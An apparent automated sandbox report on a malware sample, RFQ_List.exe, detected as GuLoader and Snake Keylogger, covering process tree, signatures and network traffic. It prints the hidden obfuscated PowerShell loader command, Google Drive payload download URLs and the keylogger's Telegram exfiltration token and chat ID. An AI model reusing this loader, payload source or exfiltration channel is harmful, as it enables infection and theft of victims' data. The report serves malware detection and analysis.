Edit tour

Windows Analysis Report
RFQ_List.exe

Overview

General Information

Sample name:	RFQ_List.exe
Analysis ID:	1543566
MD5:	27393ac93e0c60c934afa5ccdfc7c529
SHA1:	e1989ce514efd53819be62e8aa4c51975da0b3e0
SHA256:	66f7ca7287b5118119d8e6b8d55222d7662da16c12345a6122a28b64702ae69b
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

RFQ_List.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\RFQ_List.exe" MD5: 27393AC93E0C60C934AFA5CCDFC7C529)

powershell.exe (PID: 6840 cmdline: "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 5788 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cmd.exe (PID: 3196 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 6996 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7461961891:AAHpgycZJEK7D2I9irTI6QgjGM_Z4Ne7WIQ", "Chat_id": "-4555977660", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2349116146.0000000009279000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 5788	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5788, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 51907

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6840, TargetFilename: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)", CommandLine: "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_List.exe", ParentImage: C:\Users\user\Desktop\RFQ_List.exe, ParentProcessId: 6588, ParentProcessName: RFQ_List.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)", ProcessId: 6840, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T06:47:23.845919+0100	2803305	3	Unknown Traffic	192.168.2.4	51960	188.114.97.3	443	TCP
2024-10-28T06:47:32.234588+0100	2803305	3	Unknown Traffic	192.168.2.4	52015	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T06:47:20.831783+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	51943	158.101.44.242	80	TCP
2024-10-28T06:47:22.066174+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	51943	158.101.44.242	80	TCP
2024-10-28T06:47:24.496127+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	51966	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T06:47:14.901287+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	51907	142.250.185.206	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: RFQ_List.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe

Avira: detection malicious, Label: HEUR/AGEN.1333748

Found malware configuration

Source: 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7461961891:AAHpgycZJEK7D2I9irTI6QgjGM_Z4Ne7WIQ", "Chat_id": "-4555977660", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe

ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: RFQ_List.exe	ReversingLabs: Detection: 66%
Source: RFQ_List.exe	Virustotal: Detection: 35%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: RFQ_List.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51954 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:51907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:51917 version: TLS 1.2

Source: RFQ_List.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbt N source: powershell.exe, 00000001.00000002.2337305741.000000000764B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2347740691.0000000008742000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 00000001.00000002.2347740691.0000000008742000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2337305741.000000000764B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405846
Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_00406398 FindFirstFileW,FindClose,	0_2_00406398
Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\peritonealizing\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:51966 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:51943 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:51960 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:51907 -> 142.250.185.206:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52015 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51954 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002519E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RFQ_List.exe, RFQ_List.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251C2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000001.00000002.2332064457.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2332064457.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2667333235.00000000093B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2667333235.00000000093B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2677576018.00000000244D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc
Source: msiexec.exe, 00000006.00000003.2514226077.000000000942F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2667333235.000000000942B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2514226077.000000000942F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2667333235.000000000942B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2667333235.0000000009418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download
Source: powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
